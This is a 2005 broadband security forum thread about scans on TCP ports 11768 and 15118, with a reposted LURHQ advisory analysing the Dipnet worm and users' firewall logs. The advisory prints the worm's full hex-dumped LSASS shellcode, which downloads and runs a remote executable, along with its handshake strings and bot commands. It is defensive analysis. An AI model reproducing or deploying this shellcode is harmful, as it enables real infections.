Broadband Tech > Security > Security > attacks on port 11768?

reply to jamesv

Re: attacks on port 11768?

I'm seeing hits on 15118 now. Approximately 40 probes on that port so far. And 5 on 11768. I almost started a new thread but did a search first.

Dshield is showing a huge increase in scans on this port over the past 5 days:
»www.dshield.org/port_report.php?···&days=40
--
SMTP: Spam and Malware Transfer Protocol. Also used on rare occasion to transmit e-mail messages.

reply to jamesv

Scans

Scanners

reply to Link Logger
Here is a link to a site that night help.

»www.simovits.com/nyheter9902.html

They show what ports viruses and trojans use. The only one I see is port 808 but cannot find the others.

This web site shows which ports are used for what.
»www.iss.net/security_center/advi···s/Ports/

Maybe theses sites will shed some light or maybe not.

Actually I may have found why hits are on port 11768
»www.lurhq.com/dipnet.html

by LURHQ Threat Intelligence Group

URL
»www.lurhq.com/dipnet.html

Release Date
January 13, 2005

Dipnet (or Oddbob) is a worm that spreads using the well-known MS04-011 vulnerability that Sasser was based on. Its purpose is to spread an IRC DDoS bot. Later variants of Dipnet are causing some interest due to unusual traffic patterns onTCP port 11768 (and later on TCP port 15118).
Analysis
Before Dipnet exploits a host, it first attempts to connect to that host on a chosen TCP port (11768 or 15118) and sends the string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is already infected by Dipnet, it will respond with a specific response encoded in the body of the worm. The latest variant we've seen responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then closes the connection. This exchange allows the worm to avoid infecting hosts that are already running the latest version of the worm software.

If the worm ascertains that the host is not already infected, or is not runningthe latest version, it will then attempt to exploit the LSASS vulnerability on TCP port 445. The shellcode of the exploit is self-decrypting, with the bulk of the code XORed by 0xFF in order to obfuscate the payload strings and prevent null bytes from prematurely terminating the payload while being copied in memory by the affected host. When decrypted, the shellcode continues running and downloads the worm executable from a remote webserver and runs it.

The shellcode as received is as follows:

00000000 eb 00 06 00 eb 00 06 00 9b 00 2a 00 f9 00 77 00 |ë...ë.....*.ù.w.|
00000010 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 |................|
00000020 90 00 33 00 c0 00 f7 00 d0 00 8b 00 fb 00 f2 00 |..3.À.÷.Ð...û.ò.|
00000030 af 00 57 00 33 00 c9 00 b1 00 b2 00 90 00 90 00 |¯.W.3.É.±.².....|
00000040 90 00 90 00 80 00 37 00 ff 00 47 00 e2 00 fa 00 |......7.ÿ.G.â.ú.|
00000050 8b 00 ef 00 4d 00 5f 00 57 00 b8 00 30 00 fa 00 |..ï.M._.W.¸.0.ú.|
00000060 b0 00 83 00 f7 00 d0 00 ff 00 d0 00 8b 00 d8 00 |°...÷.Ð.ÿ.Ð...Ø.|
00000070 be 00 f8 00 ff 00 ff 00 ff 00 f7 00 d6 00 33 00 |¾.ø.ÿ.ÿ.ÿ.÷.Ö.3.|
00000080 c0 00 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 57 00 |À...È.÷.Ñ.ò.®.W.|
00000090 53 00 b8 00 56 00 19 00 b1 00 83 00 f7 00 d0 00 |S.¸.V...±...÷.Ð.|
000000a0 ff 00 d0 00 3e 00 89 00 44 00 b5 00 fd 00 4e 00 |ÿ.Ð.>...D.µ.ý.N.|
000000b0 0b 00 f6 00 75 00 e3 00 33 00 c0 00 8b 00 c8 00 |..ö.u.ã.3.À...È.|
000000c0 f7 00 d1 00 f2 00 ae 00 57 00 b8 00 30 00 fa 00 |÷.Ñ.ò.®.W.¸.0.ú.|
000000d0 b0 00 83 00 f7 00 d0 00 ff 00 d0 00 8b 00 d8 00 |°...÷.Ð.ÿ.Ð...Ø.|
000000e0 be 00 f5 00 ff 00 ff 00 ff 00 f7 00 d6 00 ba 00 |¾.õ.ÿ.ÿ.ÿ.÷.Ö.º.|
000000f0 f8 00 ff 00 ff 00 ff 00 f7 00 d2 00 52 00 33 00 |ø.ÿ.ÿ.ÿ.÷.Ò.R.3.|
00000100 c0 00 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 57 00 |À...È.÷.Ñ.ò.®.W.|
00000110 53 00 b8 00 56 00 19 00 b1 00 83 00 f7 00 d0 00 |S.¸.V...±...÷.Ð.|
00000120 ff 00 d0 00 3e 00 89 00 44 00 b5 00 fd 00 5a 00 |ÿ.Ð.>...D.µ.ý.Z.|
00000130 52 00 4e 00 3b 00 f2 00 75 00 e1 00 33 00 c0 00 |R.N.;.ò.u.á.3.À.|
00000140 8b 00 c8 00 f7 00 d1 00 f2 00 ae 00 90 00 90 00 |..È.÷.Ñ.ò.®.....|
00000150 33 00 c0 00 66 00 48 00 d1 00 e0 00 33 00 d2 00 |3.À.f.H.Ñ.à.3.Ò.|
00000160 50 00 52 00 ff 00 55 00 01 00 8b 00 f0 00 33 00 |P.R.ÿ.U.....ð.3.|
00000170 d2 00 52 00 52 00 52 00 52 00 57 00 ff 00 55 00 |Ò.R.R.R.R.W.ÿ.U.|
00000180 25 00 33 00 d2 00 52 00 52 00 52 00 52 00 8b 00 |%.3.Ò.R.R.R.R...|
00000190 d7 00 90 00 90 00 90 00 52 00 50 00 ff 00 55 00 |×.......R.P.ÿ.U.|
000001a0 21 00 57 00 33 00 d2 00 66 00 4a 00 d1 00 e2 00 |!.W.3.Ò.f.J.Ñ.â.|
000001b0 52 00 56 00 50 00 ff 00 55 00 1d 00 90 00 90 00 |R.V.P.ÿ.U.......|
000001c0 90 00 33 00 d2 00 52 00 b8 00 f4 00 ff 00 ff 00 |..3.Ò.R.¸.ô.ÿ.ÿ.|
000001d0 ff 00 f7 00 d0 00 8b 00 d5 00 2b 00 d0 00 42 00 |ÿ.÷.Ð...Õ.+.Ð.B.|
000001e0 90 00 90 00 52 00 ff 00 55 00 19 00 ff 00 37 00 |....R.ÿ.U...ÿ.7.|
000001f0 56 00 50 00 8b 00 d8 00 ff 00 55 00 15 00 53 00 |V.P...Ø.ÿ.U...S.|
00000200 ff 00 55 00 11 00 90 00 90 00 90 00 90 00 90 00 |ÿ.U.............|
00000210 33 00 d2 00 42 00 52 00 b8 00 f4 00 ff 00 ff 00 |3.Ò.B.R.¸.ô.ÿ.ÿ.|
00000220 ff 00 f7 00 d0 00 8b 00 d5 00 2b 00 d0 00 42 00 |ÿ.÷.Ð...Õ.+.Ð.B.|
00000230 90 00 90 00 90 00 52 00 ff 00 55 00 09 00 90 00 |......R.ÿ.U.....|
00000240 33 00 d2 00 f7 00 d2 00 c1 00 e2 00 04 00 52 00 |3.Ò.÷.Ò.Á.â...R.|
00000250 ff 00 55 00 05 00 eb 00 f3 00 90 00 87 00 db 00 |ÿ.U...ë.ó.....Û.|
00000260 ff 00 ff 00 ff 00 ff 00 b4 00 ba 00 ad 00 b1 00 |ÿ.ÿ.ÿ.ÿ.´.º.­.±.|
00000270 ba 00 b3 00 cc 00 cd 00 d1 00 bb 00 b3 00 b3 00 |º.³.Ì.Í.Ñ.».³.³.|
00000280 ff 00 a0 00 93 00 9c 00 8d 00 9a 00 9e 00 8b 00 |ÿ. .............|
00000290 ff 00 a0 00 93 00 88 00 8d 00 96 00 8b 00 9a 00 |ÿ. .............|
000002a0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00 |ÿ. .............|
000002b0 ff 00 a0 00 93 00 9c 00 93 00 90 00 8c 00 9a 00 |ÿ. .............|
000002c0 ff 00 a8 00 96 00 91 00 ba 00 87 00 9a 00 9c 00 |ÿ.¨.....º.......|
000002d0 ff 00 ac 00 93 00 9a 00 9a 00 8f 00 ff 00 b8 00 |ÿ.¬.........ÿ.¸.|
000002e0 93 00 90 00 9d 00 9e 00 93 00 be 00 93 00 93 00 |..........¾.....|
000002f0 90 00 9c 00 ff 00 a8 00 b6 00 b1 00 b6 00 b1 00 |....ÿ.¨.¶.±.¶.±.|
00000300 ba 00 ab 00 d1 00 bb 00 b3 00 b3 00 ff 00 b6 00 |º.«.Ñ.».³.³.ÿ.¶.|
00000310 91 00 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 |..............°.|
00000320 8f 00 9a 00 91 00 be 00 ff 00 b6 00 91 00 8b 00 |......¾.ÿ.¶.....|
00000330 9a 00 8d 00 91 00 9a 00 8b 00 b0 00 8f 00 9a 00 |..........°.....|
00000340 91 00 aa 00 8d 00 93 00 be 00 ff 00 b6 00 91 00 |..ª.....¾.ÿ.¶...|
00000350 8b 00 9a 00 8d 00 91 00 9a 00 8b 00 ad 00 9a 00 |............­...|
00000360 9e 00 9b 00 b9 00 96 00 93 00 9a 00 ff 00 97 00 |....¹.......ÿ...|
00000370 8b 00 8b 00 8f 00 c5 00 d0 00 d0 00 9e 00 8b 00 |......Å.Ð.Ð.....|
00000380 93 00 9e 00 91 00 8b 00 9c 00 90 00 92 00 92 00 |................|
00000390 9a 00 8d 00 9c 00 9a 00 d1 00 9c 00 90 00 92 00 |........Ñ.......|
000003a0 d0 00 8c 00 8b 00 8a 00 99 00 99 00 d1 00 9a 00 |Ð...........Ñ...|
000003b0 87 00 9a 00 ff 00 88 00 96 00 91 00 9c 00 9a 00 |....ÿ...........|
000003c0 8d 00 d1 00 9a 00 87 00 9a 00 ff 00 88 00 88 00 |..Ñ.......ÿ.....|
000003d0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
000003e0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
000003f0 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
00000400 88 00 88 00 88 00 88 00 88 00 88 00 88 00 88 00 |................|
00000410 88 00 88 00 88 00 88 00 88 00 88 00 ff 00 |............ÿ.|

The shellcode uses InternetOpenA and WinExec Windows API calls to download and execute a file from a URL. This particular shellcode downloads the file from:
»atlrce.com/stuff.exe

The worm executable sets up its own listener on the specified port in order to communicate with future instances of the worm that may attempt to exploit the host. It also communicates with two different websites in order to receive additional commands. Commands can be one of the following:

DIE: delete worm registry keys and exit
DOWNLOAD: download a file via HTTP
EXEC: execute a file
RESET: restart the scanner with a new batch of IP address masks
APPEND: insert additional IP address masks to scan

The first website provides the worm with a list of IP address ranges to scan and exploit. The second website provides the worm with other malware to download and execute. Finally, the worm begins to scan and exploit additional hosts based on the IP address masks given.
At the time of this writing, two additional executables were being served up by the control websites. One is an IRC DDoS bot identified as Backdoor.Win32.IRCBot.k, the other is a backdoor with a kernel-level driver that hides the process, known as Backdoor.Win32.Masteseq.

The DDoS bot connects to a channel on a private IRC server in Russia. At the time of this writing the channel had accumulated between 2800 and 2900 infected hosts.

About LURHQ Corporation
LURHQ Corporation is the trusted provider of Managed Security Services. Founded in 1996, LURHQ has built a strong business protecting the critical information assets of more than 400 customers by offering managed intrusion prevention and protection services. LURHQ's 24X7 Incident Handling capabilities enable customers to enhance their security posture while reducing the costs of managing their security environments. LURHQ's OPEN Service Delivery™ methodology facilitates a true partnership with customers by providing a real time view of the organization's security status via the Sherlock Enterprise Security Portal. For more information visit »www.lurhq.com.

Copyright (c) 2005 LURHQ Corporation Permission is hereby granted for the redistribution of this document electronically. It is not to be altered or edited in any way without the express written consent of LURHQ Corporation. If you wish to reprint the whole or any part of this document in any other medium excluding electronic media, please e-mail advisories@lurhq.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties implied or otherwise with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

reply to jvmorris
Here are the systems which probe both 11768 and 15118, but looking at the details it has never been in the same session.

208.209.115.244

Jan 14, 2005 14:50:05.735 - (TCP) 208.209.115.244 : 14903 >>> 192.168.1.38 : 445
Jan 14, 2005 14:50:03.702 - (TCP) 208.209.115.244 : 13969 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:50:00.657 - (TCP) 208.209.115.244 : 13969 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:10:46.683 - (TCP) 208.209.115.244 : 45320 >>> 192.168.1.38 : 445
Jan 14, 2005 14:10:44.469 - (TCP) 208.209.115.244 : 44497 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:10:41.595 - (TCP) 208.209.115.244 : 44497 >>> 68.144.238.148 : 15118
Jan 11, 2005 13:19:49.948 - (TCP) 208.209.115.244 : 56023 >>> 192.168.1.38 : 445
Jan 11, 2005 13:19:49.557 - (TCP) 208.209.115.244 : 55893 >>> 192.168.1.35 : 11768
Jan 11, 2005 12:41:07.328 - (TCP) 208.209.115.244 : 61273 >>> 192.168.1.38 : 445
Jan 11, 2005 12:41:07.017 - (TCP) 208.209.115.244 : 61195 >>> 192.168.1.35 : 11768
Aug 24, 2004 18:34:15.699 - (TCP) 208.209.115.244 : 13050 >>> 68.144.239.109 : 445
Aug 24, 2004 18:34:09.680 - (TCP) 208.209.115.244 : 13050 >>> 68.144.239.109 : 445
Aug 24, 2004 18:34:06.786 - (TCP) 208.209.115.244 : 13050 >>> 68.144.239.109 : 445

66.194.223.194

Jan 13, 2005 09:06:31.776 - (TCP) 66.194.223.194 : 24736 >>> 68.144.238.148 : 15118
Jan 13, 2005 09:06:28.511 - (TCP) 66.194.223.194 : 24736 >>> 68.144.238.148 : 15118
Jan 13, 2005 08:42:02.323 - (TCP) 66.194.223.194 : 59708 >>> 68.144.238.148 : 15118
Jan 13, 2005 08:41:59.049 - (TCP) 66.194.223.194 : 59708 >>> 68.144.238.148 : 15118
Jan 12, 2005 05:29:21.311 - (TCP) 66.194.223.194 : 5071 >>> 192.168.1.35 : 11768
Jan 12, 2005 05:03:54.886 - (TCP) 66.194.223.194 : 10630 >>> 192.168.1.35 : 11768

70.68.26.210

Jan 13, 2005 15:41:04.776 - (TCP) 70.68.26.210 : 1412 >>> 192.168.1.38 : 445
Jan 13, 2005 15:41:02.653 - (TCP) 70.68.26.210 : 1204 >>> 68.144.238.148 : 15118
Jan 13, 2005 15:40:59.709 - (TCP) 70.68.26.210 : 1204 >>> 68.144.238.148 : 15118
Jan 13, 2005 15:02:20.514 - (TCP) 70.68.26.210 : 4672 >>> 192.168.1.38 : 445
Jan 13, 2005 15:02:18.321 - (TCP) 70.68.26.210 : 4401 >>> 68.144.238.148 : 15118
Jan 13, 2005 15:02:15.417 - (TCP) 70.68.26.210 : 4401 >>> 68.144.238.148 : 15118
Jan 11, 2005 17:24:13.219 - (TCP) 70.68.26.210 : 2344 >>> 192.168.1.35 : 11768

61.218.160.26

Jan 14, 2005 01:37:35.661 - (TCP) 61.218.160.26 : 10360 >>> 192.168.1.38 : 445
Jan 14, 2005 01:37:33.828 - (TCP) 61.218.160.26 : 10231 >>> 68.144.238.148 : 15118
Jan 14, 2005 00:47:30.320 - (TCP) 61.218.160.26 : 20460 >>> 192.168.1.38 : 445
Jan 14, 2005 00:47:24.802 - (TCP) 61.218.160.26 : 20021 >>> 68.144.238.148 : 15118
Jan 14, 2005 00:47:21.677 - (TCP) 61.218.160.26 : 19765 >>> 68.144.238.148 : 15118
Jan 11, 2005 19:59:15.645 - (TCP) 61.218.160.26 : 11323 >>> 192.168.1.38 : 445
Jan 11, 2005 19:59:14.924 - (TCP) 61.218.160.26 : 11259 >>> 192.168.1.35 : 11768

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel

Interesting. Thank you.

reply to Sr Tech
Just for your general information, I don't think that Simovitz URL has been updated in over two years (more's the pity).
--
Regards, Joseph V. Morris

reply to jvmorris
I just went back to check on the status of IP addresses probing these ports that I had found in the MyNetWatchman database.

Most (but not all) of these IPs that were still active had switched from 11768 to 15118 on or about 13-14 Jan 2005. If there were enough records, it was not unusual to see episodes in which the IP seemed to alternate between probing 11768 and 15118 for a day or so. Still, I didn't find any episodes in which one of these IP addresses had probed both ports in the same episode.

There's one particularly well-documented source at »www.mynetwatchman.com/LID.asp?IID=141219490 .

There's one odd-ball probe reported for some of these sites -- it's for protocol 255 originating from port 65535 to destination port 65535. Interestingly, protocol 255 is listed as an IANA-reserved protocol. (See »www.iana.org/assignments/protocol-numbers .)
--
Regards, Joseph V. Morris